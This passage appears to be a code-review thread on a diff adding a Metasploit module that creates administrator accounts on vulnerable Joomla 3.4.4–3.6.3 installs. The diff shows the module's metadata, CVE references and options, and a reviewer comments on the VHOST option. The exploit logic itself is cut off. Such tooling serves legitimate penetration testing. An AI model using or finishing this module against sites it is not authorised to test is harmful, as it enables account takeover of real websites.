modules/auxiliary/admin/http/joomla_privilege_escalation.rb

```diff
@@ -0,0 +1,140 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Joomla Account Creation and Privilege Escalation',
+      'Description'    => %q{
+        This module allows to create an arbitrary account with administrative privileges in Joomla versions 3.4.4
+        through 3.6.3. If an email server is configured in Joomla, an email will be sent to activate the account (the account is disabled by default).
+      },
+      'References'     =>
+        [
+          ['CVE', '2016-8869'],
+          ['CVE', '2016-8870'],
+          ['URL', 'https://developer.joomla.org/security-centre/660-20161002-core-elevated-privileges.html'],
+          ['URL', 'https://developer.joomla.org/security-centre/659-20161001-core-account-creation.html'],
+          ['URL', 'https://medium.com/@showthread/joomla-3-6-4-account-creation-elevated-privileges-write-up-and-exploit-965d8fb46fa2']
+        ],
+      'Author'         =>
+        [
+          'Fabio Pires <fp[at]integrity.pt>',     # module creation and privilege escalation
+          'Filipe Reis <fr[at]integrity.pt>',     # module creation and privilege escalation
+          'Vitor Oliveira <vo[at]integrity.pt>',  # module creation and privilege escalation
+        ],
+      'Privileged'     => false,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['Joomla 3.4.4 - 3.6.3', {}]],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => 'Oct 25 2016'
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The relative URI of the Joomla instance', '/']),
+        OptString.new('USERNAME', [true, 'Username that will be created', 'expl0it3r']),
+        OptString.new('PASSWORD', [true, 'Password for the username', 'expl0it3r']),
+        OptString.new('EMAIL', [true, 'Email to receive the activation code for the account', 'example@youremail.com'])
+      ], self.class)
+      deregister_options('VHOST')
```

Comment:
They're for different purposes, so I think you should leave it in unless it's causing a problem. ```VHOST``` changes the ```Host``` header.